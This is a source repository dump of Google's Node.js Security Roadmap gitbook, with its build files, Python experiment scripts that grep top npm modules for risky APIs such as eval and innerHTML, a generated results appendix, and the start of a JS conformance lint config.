├── .bookignore
├── .gitignore
├── .well-known
    └── security.txt
├── CONTRIBUTING.md
├── CONTRIBUTORS.md
├── LICENSE
├── Makefile
├── README.md
├── SUMMARY.md
├── app.yaml
├── appendix
    ├── .gitignore
    ├── bad-pattern-grep
    │   └── experiment.py
    ├── dyn-load
    │   └── experiment.py
    ├── experiments.md
    ├── jsconf
    │   ├── conformance_proto.textproto
    │   └── experiment.py
    ├── lazy-load
    │   └── experiment.py
    ├── py_common
    │   ├── __init__.py
    │   └── npm.py
    ├── test-code
    │   └── experiment.py
    ├── top100.txt
    └── uses-scripts
    │   └── experiment.py
├── book.json.withcomments
├── chapter-1
    ├── recap.md
    ├── threat-0DY.md
    ├── threat-BOF.md
    ├── threat-CRY.md
    ├── threat-DEX.md
    ├── threat-DOS.md
    ├── threat-EXF.md
    ├── threat-LQC.md
    ├── threat-MTP.md
    ├── threat-QUI.md
    ├── threat-RCE.md
    ├── threat-SHP.md
    ├── threat-UIR.md
    └── threats.md
├── chapter-2
    ├── bounded-eval.md
    ├── bundling.md
    ├── dynamism.md
    ├── example
    │   ├── .gitignore
    │   ├── graphs
    │   │   ├── filtered.dot
    │   │   ├── filtered.svg
    │   │   ├── full.dot
    │   │   └── full.svg
    │   ├── index.js
    │   ├── lib
    │   │   ├── dynamic.js
    │   │   ├── lazy.js
    │   │   ├── opt2.js
    │   │   └── static.js
    │   ├── make_dep_graph.sh
    │   ├── package.json
    │   └── test
    │   │   └── test.js
    ├── experiments
    │   └── webpack-compat
    │   │   ├── .gitignore
    │   │   ├── goodbye.js
    │   │   ├── hello.js
    │   │   ├── index.js
    │   │   ├── package.json
    │   │   ├── test-utils.js
    │   │   ├── test.sh
    │   │   ├── test
    │   │       └── test.js
    │   │   └── webpack.config.js
    ├── source-contents.md
    ├── synthetic-modules.md
    └── what-about-eval.md
├── chapter-3
    └── knowing_dependencies.md
├── chapter-4
    └── close_dependencies.md
├── chapter-5
    └── oversight.md
├── chapter-6
    └── failing.md
├── chapter-7
    ├── child-processes.md
    ├── examples
    │   ├── sh
    │   │   ├── index.js
    │   │   ├── package.json
    │   │   └── test
    │   │   │   └── test.js
    │   └── sql
    │   │   ├── index.js
    │   │   ├── package.json
    │   │   └── test
    │   │       └── test.js
    ├── libraries.md
    ├── query-langs.md
    └── structured-strings.md
├── cover.md
├── images
    ├── FileExternal.svg
    ├── GitHub-Mark-32px.png
    ├── ic_print_24dp.svg
    └── npmjs-node.png
├── license.md
├── package-lock.json
├── package.json
├── styles
    └── website.css
└── third_party
    ├── __init__.py
    └── jslex
        ├── __init__.py
        └── jslex.py


/.bookignore:
--------------------------------------------------------------------------------
 1 | app.yaml
 2 | Makefile
 3 | book.json.withcomments
 4 | appendix/**/*.py
 5 | appendix/**/*.textproto
 6 | chapter-2/example/**/*.js
 7 | chapter-2/experiments/**/*.js
 8 | chapter-7/examples/**/*.js
 9 | CONTRIBUTING.md
10 | **/*.sh
11 | third_party
12 | package.json
13 | package-lock.json
14 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # See appendix/experiments.md for how to run experiments.
 2 | appendix/jsconf/externs
 3 | appendix/tools
 4 | # Generated by `npm install`
 5 | node_modules
 6 | npm-debug.log
 7 | chapter-2/example/package-lock.json
 8 | # Generated by Makefile
 9 | www
10 | deploy
11 | .*.tstamp
12 | #book.json  # Should be ignored but breaks gitbook
13 | # Generated by `gitbook serve`
14 | _book
15 | # Emacs droppings
16 | .\#*
17 | *~
18 | # Python droppings
19 | *.pyc
20 | 


--------------------------------------------------------------------------------
/.well-known/security.txt:
--------------------------------------------------------------------------------
1 | Contact: mikesamuel@gmail.com
2 | Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md
3 | 


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # How to Contribute
 2 | 
 3 | We'd love to accept your patches and contributions to this project. There are
 4 | just a few small guidelines you need to follow.
 5 | 
 6 | ## Contributor License Agreement
 7 | 
 8 | Contributions to this project must be accompanied by a Contributor License
 9 | Agreement. You (or your employer) retain the copyright to your contribution;
10 | this simply gives us permission to use and redistribute your contributions as
11 | part of the project. Head over to <https://cla.developers.google.com/> to see
12 | your current agreements on file or to sign a new one.
13 | 
14 | You generally only need to submit a CLA once, so if you've already
15 | submitted one (even if it was for a different project), you probably
16 | don't need to do it again.
17 | 
18 | ## Code reviews
19 | 
20 | All submissions, including submissions by project members, require review. We
21 | use GitHub pull requests for this purpose. Consult
22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more
23 | information on using pull requests.
24 | 


--------------------------------------------------------------------------------
/CONTRIBUTORS.md:
--------------------------------------------------------------------------------
 1 | * [Ali Ijaz Sheikh](https://github.com/ofrobots)
 2 | * [Franziska Hinkelmann](https://github.com/fhinkel/)
 3 | * [Jen Tong](https://github.com/mimming)
 4 | * [John J. Barton](https://github.com/johnjbarton)
 5 | * [Justin Beckwith](https://github.com/JustinBeckwith)
 6 | * [Mark S. Miller](https://github.com/erights)
 7 | * [Mike Samuel](https://github.com/mikesamuel)
 8 | * [Myles Borins](https://github.com/mylesborins)
 9 | 
10 | Special thanks for feedback and criticism:
11 | 
12 | * [Matteo Collina](https://github.com/mcollina)
13 | * [Rich Trott](https://github.com/Trott)
14 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | Markdown and gitbook content is (C) Google LLC and is
 2 | made available under
 3 | https://creativecommons.org/licenses/by/4.0/
 4 | 
 5 | 
 6 | Code is available under the Apache 2.0 License
 7 | ----------------------------------------------
 8 | Copyright 2017 Google LLC
 9 | 
10 | Licensed under the Apache License, Version 2.0 (the "License");
11 | you may not use this file except in compliance with the License.
12 | You may obtain a copy of the License at
13 | 
14 |     https://www.apache.org/licenses/LICENSE-2.0
15 | 
16 | Unless required by applicable law or agreed to in writing, software
17 | distributed under the License is distributed on an "AS IS" BASIS,
18 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
19 | See the License for the specific language governing permissions and
20 | limitations under the License.


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
  1 | # This Makefile builds various versions of the Gitbook, runs
  2 | # sanity checks, and sets up a deployment directory.
  3 | #
  4 | # See `make help`
  5 | 
  6 | define HELP
  7 | Targets
  8 | =======
  9 | `make book`         puts HTML files under www/
 10 | `make pdf`          builds the PDF version
 11 | `make serve_static` serve the book from http://localhost:4000/
 12 | `make serve`        launch the builtin gitbook debug server
 13 | `make check`        runs sanity checks
 14 | `make deploy`       builds the deployment directory and runs checks
 15 | 
 16 | Setup
 17 | =====
 18 | This assumes that PATH includes
 19 |    https://github.com/gjtorikian/html-proofer
 20 |    https://calibre-ebook.com/download
 21 | that the following environment variables point to reasonable values:
 22 |    HTML_PROOFER   # path to htmlproofer executable
 23 |    CALIBRE_HOME   # path to directory containing calibre executables
 24 | 
 25 | Deploying
 26 | =========
 27 | `make deploy` builds the deploy directory.
 28 | From that directory `gcloud app deploy --project node-sec-roadmap`
 29 | deploys to the canonical location if you have the right
 30 | privileges and have run `gcloud auth login`.
 31 | endef
 32 | export HELP
 33 | 
 34 | 
 35 | ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))
 36 | 
 37 | # External dependency used to detect dead links
 38 | ifeq ($(HTML_PROOFER),)
 39 |   HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer
 40 |   ifeq (,$(wildcard ${HTML_PROOFER}))
 41 | 	HTML_PROOFER:=/bin/echo
 42 |   endif
 43 | endif
 44 | 
 45 | # External dependency used to build pdf
 46 | ifeq ($(CALIBRE_HOME),)
 47 |   CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/
 48 | endif
 49 | 
 50 | 
 51 | # Bits that gitbook depends on
 52 | GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \
 53 | 		$(wildcard chapter-*/*.md) appendix/experiments.md \
 54 | 		styles/website.css images/*
 55 | 
 56 | 
 57 | help:
 58 | 	@echo "$$HELP"
 59 | 
 60 | book.json : book.json.withcomments
 61 | 	@cat book.json.withcomments \
 62 | 	| perl -ne 'print unless m/^[ \t]*#/' > book.json
 63 | 
 64 | pdf : www/node-sec-roadmap.pdf
 65 | www/node-sec-roadmap.pdf : $(GITBOOK_DEPS)
 66 | 	PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \
 67 | 	    ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf
 68 | 
 69 | book : www/.book.tstamp
 70 | www/.book.tstamp : $(GITBOOK_DEPS)
 71 | 	"${ROOT_DIR}"/node_modules/.bin/gitbook build . www
 72 | 	@touch www/.book.tstamp
 73 | 
 74 | check : .check.tstamp
 75 | .check.tstamp : deploy/.deploy.tstamp
 76 | 	touch .check.tstamp
 77 | 	echo Checking that we correctly capitalize npm and Nodejs
 78 | 	echo and that all Markdown link names are defined.
 79 | 	@! find deploy/www/ -name \*.html \
 80 | 	    | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \
 81 | 	    | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/'
 82 | 	echo Checking for dead links
 83 | 	@if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \
 84 | 		echo "Warning: HTML_PROOFER not available"; \
 85 | 	else \
 86 | 		echo Running htmlproofer; \
 87 | 		"${HTML_PROOFER}" \
 88 | 		  --alt-ignore=example/graphs/full.svg \
 89 | 		  "${ROOT_DIR}"/deploy/www/; \
 90 | 	fi
 91 | 	@find deploy -name node_modules \
 92 | 	    || (echo "deploy/ should not include node_modules"; false)
 93 | 
 94 | serve : $(GITBOOK_DEPS)
 95 | 	"${ROOT_DIR}"/node_modules/.bin/gitbook serve
 96 | 
 97 | serve_static : book
 98 | 	pushd www; python -m SimpleHTTPServer 4000; popd
 99 | 
100 | clean :
101 | 	rm -rf www/ deploy/ _book/ book.json .*.tstamp
102 | 
103 | node_modules : package.json
104 | 	npm install --only=prod
105 | 	@touch node_modules/
106 | 
107 | deploy : deploy/.deploy.tstamp check
108 | deploy/.deploy.tstamp : book pdf app.yaml
109 | 	rm -rf deploy/
110 | 	mkdir deploy/
111 | 	cp app.yaml deploy/
112 | 	cp -r www/ deploy/www/
113 | 	@touch deploy/.deploy.tstamp
114 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Node.js Security Roadmap
 2 | 
 3 | The security roadmap is a [gitbook](https://toolchain.gitbook.com/)
 4 | publication available at
 5 | *[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*.
 6 | 
 7 | ```sh
 8 | $ npm start
 9 | ```
10 | 
11 | will serve the book via `localhost:4000`.
12 | 
13 | ```sh
14 | $ make help
15 | ```
16 | 
17 | will display help information about other options.
18 | 
19 | Please file errata at the
20 | [issue tracker](https://github.com/google/node-sec-roadmap/issues)
21 | or send us a pull request.
22 | 
23 | If you'd like to help out, please also see our
24 | [contribution guidelines](CONTRIBUTING.md).
25 | 


--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
 1 | # Summary
 2 | 
 3 | *  [Threat Environment](chapter-1/threats.md)
 4 |   *  [Zero Day](chapter-1/threat-0DY.md)
 5 |   *  [Buffer Overflow](chapter-1/threat-BOF.md)
 6 |   *  [Weak Crypto](chapter-1/threat-CRY.md)
 7 |   *  [Poor Developer Experience](chapter-1/threat-DEX.md)
 8 |   *  [Denial of Service](chapter-1/threat-DOS.md)
 9 |   *  [Exfiltration of Data](chapter-1/threat-EXF.md)
10 |   *  [Low Quality Code](chapter-1/threat-LQC.md)
11 |   *  [Malicious Third-Party Code](chapter-1/threat-MTP.md)
12 |   *  [Query Injection](chapter-1/threat-QUI.md)
13 |   *  [Remote Code Execution](chapter-1/threat-RCE.md)
14 |   *  [Shell Injection during Production](chapter-1/threat-SHP.md)
15 |   *  [Unintended Require](chapter-1/threat-UIR.md)
16 |   *  [Recap](chapter-1/recap.md)
17 | *  [Dynamism when you need it](chapter-2/dynamism.md)
18 |   *  [Dynamic Bundling](chapter-2/bundling.md)
19 |   *  [Production Source Lists](chapter-2/source-contents.md)
20 |   *  [What about eval?](chapter-2/what-about-eval.md)
21 |   *  [Synthetic Modules](chapter-2/synthetic-modules.md)
22 |   *  [Bounded Eval](chapter-2/bounded-eval.md)
23 | *  [Knowing your dependencies](chapter-3/knowing_dependencies.md)
24 | *  [Keeping your dependencies close](chapter-4/close_dependencies.md)
25 | *  [Oversight](chapter-5/oversight.md)
26 | *  [When all else fails](chapter-6/failing.md)
27 | *  [Library support for safe coding practices](chapter-7/libraries.md)
28 |   *  [Query languages](chapter-7/query-langs.md)
29 |   *  [Child processes](chapter-7/child-processes.md)
30 |   *  [Structured strings](chapter-7/structured-strings.md)
31 | 
32 | ----
33 | 
34 | *  [Appendix: Experiments](appendix/experiments.md)
35 | *  [Contributors](CONTRIBUTORS.md)
36 | *  [License](license.md)
37 | *  [Errata](https://github.com/google/node-sec-roadmap/issues)
38 | 


--------------------------------------------------------------------------------
/app.yaml:
--------------------------------------------------------------------------------
 1 | # cloud.google.com/appengine/docs/standard/python/config/appref
 2 | runtime: python27
 3 | api_version: 1
 4 | threadsafe: true
 5 | 
 6 | handlers:
 7 | - url: /
 8 |   static_files: www/index.html
 9 |   upload: www/index.html
10 |   secure: always
11 |   mime_type: text/html; charset=UTF-8
12 |   expiration: 30m
13 | 
14 | - url: /(.*[.]html)$
15 |   static_files: www/\1
16 |   upload: www/(.*[.]html)$
17 |   secure: always
18 |   mime_type: text/html; charset=UTF-8
19 |   expiration: 30m
20 | 
21 | - url: /(.*[.]css)$
22 |   static_files: www/\1
23 |   upload: www/(.*[.]css)$
24 |   secure: always
25 |   mime_type: text/css; charset=UTF-8
26 |   expiration: 30m
27 | 
28 | - url: /(.*[.]js)$
29 |   static_files: www/\1
30 |   upload: www/(.*[.]js)$
31 |   secure: always
32 |   mime_type: text/javascript; charset=UTF-8
33 |   expiration: 30m
34 | 
35 | - url: /(.*[.]json)$
36 |   static_files: www/\1
37 |   upload: www/(.*[.]json)$
38 |   secure: always
39 |   mime_type: application/json; charset=UTF-8
40 |   expiration: 30m
41 | 
42 | - url: /(.*[.]txt)$
43 |   static_files: www/\1
44 |   upload: www/(.*[.]txt)$
45 |   secure: always
46 |   mime_type: text/plain; charset=UTF-8
47 |   expiration: 30m
48 | 
49 | - url: /(.*[.]svg)$
50 |   static_files: www/\1
51 |   upload: www/(.*[.]svg)$
52 |   secure: always
53 |   mime_type: image/svg+xml; charset=UTF-8
54 |   expiration: 30m
55 | 
56 | - url: /(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
57 |   static_files: www/\1
58 |   upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
59 |   secure: always
60 |   expiration: 30m
61 | 
62 | skip_files:
63 | - ^(.*/)?#.*#$
64 | - ^(.*/)?.*~$
65 | - ^(.*/)?.*\.py[co]$
66 | - ^(.*/)?.*/RCS/.*$
67 | - ^(.*/)?\.(?!well-known(?:/|$)).*$
68 | 


--------------------------------------------------------------------------------
/appendix/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules/**
2 | separate-modules/**
3 | **~
4 | **.pyc
5 | 


--------------------------------------------------------------------------------
/appendix/bad-pattern-grep/experiment.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | 
  3 | # Copyright 2017 Google LLC
  4 | #
  5 | # Licensed under the Apache License, Version 2.0 (the "License");
  6 | # you may not use this file except in compliance with the License.
  7 | # You may obtain a copy of the License at
  8 | #
  9 | #     https://www.apache.org/licenses/LICENSE-2.0
 10 | #
 11 | # Unless required by applicable law or agreed to in writing, software
 12 | # distributed under the License is distributed on an "AS IS" BASIS,
 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 | # See the License for the specific language governing permissions and
 15 | # limitations under the License.
 16 | 
 17 | """
 18 | Look for problematic patterns like calls to eval and assignments
 19 | to innerHTML that often lead to XSS when not consistently guarded.
 20 | """
 21 | 
 22 | import py_common.npm
 23 | import re
 24 | import sys
 25 | 
 26 | _LEFT_BOUNDARY = r'(?<![.$_\w])'
 27 | _RIGHT_BOUNDARY = r'(?![.$_\w])'
 28 | 
 29 | _PATTERNS = (
 30 |     ('eval',
 31 |      re.compile(_LEFT_BOUNDARY + r'eval' + _RIGHT_BOUNDARY)),
 32 |     ('Function constructor',
 33 |      re.compile(_LEFT_BOUNDARY + 'new\s*Function' + _RIGHT_BOUNDARY)),
 34 |     ('innerHTML assignment',
 35 |      re.compile('[.]\s*(inner|outer)HTML\s*=')),
 36 |     ('URL property assignment',
 37 |      re.compile('[.]\s*(src|href)\s*=')),
 38 | )
 39 | 
 40 | def find_violations(node_modules, module_name):
 41 |     violations = []
 42 |     js_srcs = py_common.npm.js_srcs_almost_worst_case(node_modules, module_name)
 43 |     for (_, js_path) in js_srcs:
 44 |         content = py_common.npm.preprocess_js_content(file(js_path, 'r').read())
 45 |         for (rule_name, pattern) in _PATTERNS:
 46 |             for _ in pattern.finditer(content):
 47 |                 violations.append(rule_name)
 48 |     return violations
 49 | 
 50 | 
 51 | if __name__ == '__main__':
 52 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
 53 | 
 54 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
 55 | 
 56 |     # Maps rule identifiers to sets of offending modules.
 57 |     rule_violations = {}
 58 | 
 59 |     module_count = 0
 60 |     for module_name in top100:
 61 |         violations = find_violations(node_modules, module_name)
 62 |         if 'Parse error' in violations or 'Argument list too long' in violations:
 63 |             pass
 64 |         else:
 65 |             module_count += 1
 66 |         for v in violations:
 67 |             if v in rule_violations:
 68 |                 vmap = rule_violations[v]
 69 |             else:
 70 |                 vmap = rule_violations[v] = {}
 71 |             vmap[module_name] = vmap.get(module_name, 0) + 1
 72 | 
 73 |     # TODO: exclude Parse error and Argument list too long
 74 | 
 75 |     print "## Grepping for Problems {#grep-problems}"
 76 |     print ""
 77 |     print "JS Conformance uses sophisticated type reasoning to find"
 78 |     print "problems in JavaScript code"
 79 |     print "(see [JS Conformance experiment](#jsconf))."
 80 |     print "It may not find problems in code that lacks type hints"
 81 |     print "or that does not parse."
 82 |     print ""
 83 |     print "Grep can be used to reliably find some subset of problems that"
 84 |     print "JS Conformance can identify."
 85 |     print ""
 86 |     print "If grep finds more of the kinds of problems that it can find"
 87 |     print "than JS Conformance, then the code cannot be effectively vetted"
 88 |     print "by code quality tools like JS Conformance."
 89 |     print ""
 90 |     print "| Violation | Count of Modules | Total Count | Quartiles |"
 91 |     print "| --------- | ---------------- | ----------- | --------- |"
 92 |     for (v, vmap) in sorted(rule_violations.items()):
 93 |         count = 0
 94 |         total_count = 0
 95 |         values = vmap.values()
 96 |         for n in values:
 97 |             count += 1
 98 |             total_count += n
 99 |         values += [0] * (module_count - count)
100 |         values.sort()
101 |         quartiles = '%d / %d / %d' % (
102 |             values[len(values) >> 2],
103 |             values[len(values) >> 1],
104 |             values[(len(values) * 3) >> 2],
105 |         )
106 |         print "| `%s` | %d | %d | %s |" % (
107 |             v, count, total_count, quartiles)
108 | 


--------------------------------------------------------------------------------
/appendix/dyn-load/experiment.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | # Copyright 2017 Google LLC
 4 | #
 5 | # Licensed under the Apache License, Version 2.0 (the "License");
 6 | # you may not use this file except in compliance with the License.
 7 | # You may obtain a copy of the License at
 8 | #
 9 | #     https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 | 
17 | """Looks for dynamic code loading patterns.
18 | 
19 | Patterns to identify include
20 | 
21 |   * require(...) where ... is not a string literal.
22 |   * eval
23 |   * Function(...) where there is more than one argument or the sole
24 |     argument is not a function.
25 | 
26 | """
27 | 
28 | import json
29 | import os.path
30 | import py_common.npm
31 | import re
32 | import shutil
33 | import sys
34 | 
35 | 
36 | dynamic_load_pattern = re.compile(
37 |     r'(?<![_$\w.])require\s*\(\s*[^\s)\"\']'
38 | #    r'(?<![_$\w.])require\s*(?:\(\s*[^\s)\"\']|[^\(])'  # To also match indirect uses of require, like aliasing it to a variable.
39 |     )
40 | 
41 | def find_dynamic_load(node_modules, module_name):
42 |     return py_common.npm.js_srcs_matching(
43 |         node_modules, module_name, dynamic_load_pattern,
44 |         module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
45 | 
46 | 
47 | if __name__ == '__main__':
48 |     (node_modules, separate_modules, top100_txt) = sys.argv[1:]
49 | 
50 |     top100 = [x for x in file(top100_txt).read().split('\n') if x]
51 | 
52 |     uses = 0
53 |     total_count = 0
54 |     has_dynamic_load = {}
55 |     for module_name in top100:
56 |         js_srcs = find_dynamic_load(node_modules, module_name)
57 |         has_dynamic_load[module_name] = js_srcs
58 |         if len(js_srcs):
59 |             uses += 1
60 |         total_count += 1
61 | 
62 | #    for k, v in has_dynamic_load.iteritems():
63 | #        print "%s: %r" % (k, v)
64 | 
65 |     print (
66 | """
67 | ## Dynamic loads {#dynamic_load}
68 | 
69 | Dynamic loading can complicate code bundling.
70 | 
71 | %d of %d = %1.02f%% call `require(...)` without a literal string argument.
72 | """ % (uses, total_count, (100.0 * uses) / total_count))
73 | 


--------------------------------------------------------------------------------
/appendix/experiments.md:
--------------------------------------------------------------------------------
  1 | # npm Experiments
  2 | 
  3 | Below are summaries of experiments to check how compatible common npm
  4 | modules are with preprocessing, static checks, and other measures
  5 | to manage cross-cutting security concerns.
  6 | 
  7 | 
  8 | <!-- Begin generated summary -->
  9 | 
 10 | ## Grepping for Problems {#grep-problems}
 11 | 
 12 | JS Conformance uses sophisticated type reasoning to find
 13 | problems in JavaScript code
 14 | (see [JS Conformance experiment](#jsconf)).
 15 | It may not find problems in code that lacks type hints
 16 | or that does not parse.
 17 | 
 18 | Grep can be used to reliably find some subset of problems that
 19 | JS Conformance can identify.
 20 | 
 21 | If grep finds more of the kinds of problems that it can find
 22 | than JS Conformance, then the code cannot be effectively vetted
 23 | by code quality tools like JS Conformance.
 24 | 
 25 | | Violation | Count of Modules | Total Count | Quartiles |
 26 | | --------- | ---------------- | ----------- | --------- |
 27 | | `Function constructor` | 32 | 200 | 0 / 0 / 1 |
 28 | | `URL property assignment` | 35 | 471 | 0 / 0 / 3 |
 29 | | `eval` | 24 | 87 | 0 / 0 / 0 |
 30 | | `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 |
 31 | 
 32 | ## Dynamic loads {#dynamic_load}
 33 | 
 34 | Dynamic loading can complicate code bundling.
 35 | 
 36 | 33 of 108 = 30.56% call `require(...)` without a literal string argument.
 37 | 
 38 | ## JS Conformance {#jsconf}
 39 | 
 40 | JS Conformance identifies uses of risky APIs.
 41 | 
 42 | Some modules did not parse.  This may be due to TypeScript.
 43 | JSCompiler doesn't deal well with mixed JavaScript and TypeScript
 44 | inputs.
 45 | 
 46 | If a module is both in the top 100 and is a dependency of another
 47 | module in the top 100, then it will be multiply counted.
 48 | 
 49 | Out of 69 modules that parsed
 50 | 
 51 | | Violation | Count of Modules | Total Count | Quartiles |
 52 | | --------- | ---------------- | ----------- | --------- |
 53 | | `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 |
 54 | | `Argument list too long` | 8 | 8 | 0 / 0 / 0 |
 55 | | `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 |
 56 | | `Parse error.` | 31 | 232 | 0 / 0 / 2 |
 57 | | `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 |
 58 | | `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 |
 59 | | `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 |
 60 | | `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 |
 61 | | `required "..." namespace not provided yet` | 7 | 30 | 0 / 0 / 0 |
 62 | | `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 |
 63 | 
 64 | ## Lazy loads {#lazy_load}
 65 | 
 66 | Lazy loading can complicate code bundling if care is not taken.
 67 | 
 68 | 71 of 108 = 65.74% contain a use of require inside a `{...}` block.
 69 | 
 70 | 
 71 | ## Prod bundle includes test code {#test_code}
 72 | 
 73 | Some of the top 100 modules are test code, e.g. mocha, chai.
 74 | This measures which modules, when installed `--only=prod` include
 75 | test patterns.
 76 | 
 77 | 50 of 108 = 46.30% contain test code patterns
 78 | 
 79 | 
 80 | ## Uses Scripts {#uses_scripts}
 81 | 
 82 | Unless steps are taken, installation scripts run code on
 83 | a developer's workstation when they have write access to
 84 | local repositories.  If this number is small, having
 85 | humans check installation scripts before running might
 86 | be feasible.
 87 | 
 88 | 4 of 979 = 0.41% use installation scripts
 89 | 
 90 | 
 91 | <!-- End generated summary -->
 92 | 
 93 | 
 94 | 
 95 | ## Methodology
 96 | 
 97 | The code is [available on GitHub][code].
 98 | 
 99 | ```bash
100 | $ npm --version
101 | 3.10.10
102 | ```
103 | 
104 | ### Top 100 Module list
105 | 
106 | I extracted `top100.txt` by browsing to the most depended-upon
107 | [package list][top100] and running the below in the dev console until
108 | I had >= 100 entries.
109 | 
110 | ```js
111 | var links = document.querySelectorAll('a.name')
112 | var top100 = Object.create(null)
113 | for (var i = 0; i < links.length; ++i) {
114 |   var link = links[i];
115 |   var packageName = link.getAttribute('href').replace(/^.*\/package\//, '')
116 |   top100[packageName] = true;
117 | }
118 | var top100Names = Object.keys(top100)
119 | top100Names.sort();
120 | top100Names
121 | ```
122 | 
123 | ----
124 | 
125 | We also require some tools so that we can run JSCompiler against
126 | node modules.  From the root directory:
127 | 
128 | ```sh
129 | mkdir tools
130 | curl https://dl.google.com/closure-compiler/compiler-latest.zip \
131 |      > /tmp/closure-latest.zip
132 | pushd tools
133 |   jar xf /tmp/closure-latest.zip
134 | popd
135 | pushd jsconf
136 |   mkdir externs
137 |   pushd externs
138 |     git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git
139 |   popd
140 | popd
141 | ```
142 | 
143 | 
144 | ### Experiments
145 | 
146 | Each experiment corresponds to a directory with an executable
147 | `experiment.py` file which takes a `node_modules` directory, a `separate-modules`
148 | directory, and the top 100 module list and which outputs a snippet of markup.
149 | 
150 | Running
151 | 
152 | ```bash
153 | cat top100.txt | xargs npm install --ignore-scripts --only=prod
154 | mkdir separate-modules
155 | cd separate-modules
156 | for pn in $(cat ../top100.txt ); do
157 |   mkdir -p "$pn"
158 |   pushd "$pn"
159 |   npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn"
160 |   popd
161 | done
162 | ```
163 | 
164 | pulls down the list of node modules.  As of this writing, there are 980
165 | modules that are in the top100 list or are direct or indirect prod
166 | dependencies thereof.
167 | 
168 | To run the experiments and place the outputs under `/tmp/mds/`, run
169 | 
170 | ```bash
171 | mkdir -p /tmp/mds/
172 | export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH"
173 | for f in *; do
174 |   if [ -f "$f"/experiment.py ]; then
175 |     "$f"/experiment.py node_modules separate-modules top100.txt \
176 |     > "/tmp/mds/$f.md"
177 |   fi
178 | done
179 | ```
180 | 
181 | Concatenating those markdown snippets produces the summary above.
182 | 
183 | ```bash
184 | (for f in $(echo /tmp/mds/*.md | sort); do
185 |    cat "$f";
186 |  done) \
187 | > /tmp/mds/summary
188 | ```
189 | 
190 | [code]: https://github.com/google/node-sec-roadmap/tree/master/appendix
191 | [top100]: https://www.npmjs.com/browse/depended
192 | 


--------------------------------------------------------------------------------
/appendix/jsconf/conformance_proto.textproto:
--------------------------------------------------------------------------------
  1 | # Copyright 2014 The Closure Compiler Authors.
  2 | #
  3 | # Licensed under the Apache License, Version 2.0 (the "License");
  4 | # you may not use this file except in compliance with the License.
  5 | # You may obtain a copy of the License at
  6 | #
  7 | #     http://www.apache.org/licenses/LICENSE-2.0
  8 | #
  9 | # Unless required by applicable law or agreed to in writing, software
 10 | # distributed under the License is distributed on an "AS IS" BASIS,
 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 12 | # See the License for the specific language governing permissions and
 13 | # limitations under the License.
 14 | 
 15 | # This file contains example JS conformance configurations for various problems
 16 | # with JavaScript. Since each project may want to opt-in to different rules, and
 17 | # each project may need its own specific whitelist, the examples in this file
 18 | # are meant to be copied to a project specific conformance_proto.textproto file.
 19 | 
 20 | requirement: {
 21 |   type: BANNED_NAME
 22 |   error_message: 'eval is not allowed'
 23 | 
 24 |   value: 'eval'
 25 | 
 26 |   whitelist: 'javascript/closure/base.js'
 27 |   whitelist: 'javascript/closure/json/json.js'
 28 | }
 29 | 
 30 | requirement: {
 31 |   rule_id: 'closure:stringFunctionDefinition'
 32 |   type: RESTRICTED_NAME_CALL
 33 | 
 34 |   value: 'Function:function()'
 35 |   value: 'setTimeout:function(string, ...?)'
 36 |   value: 'setImmediate:function(string, ...?)'
 37 |   value: 'setInterval:function(string, ...?)'
 38 |   value: 'requestAnimationFrame:function(string, ...?)'
 39 | 
 40 |   error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
 41 | }
 42 | 
 43 | requirement: {
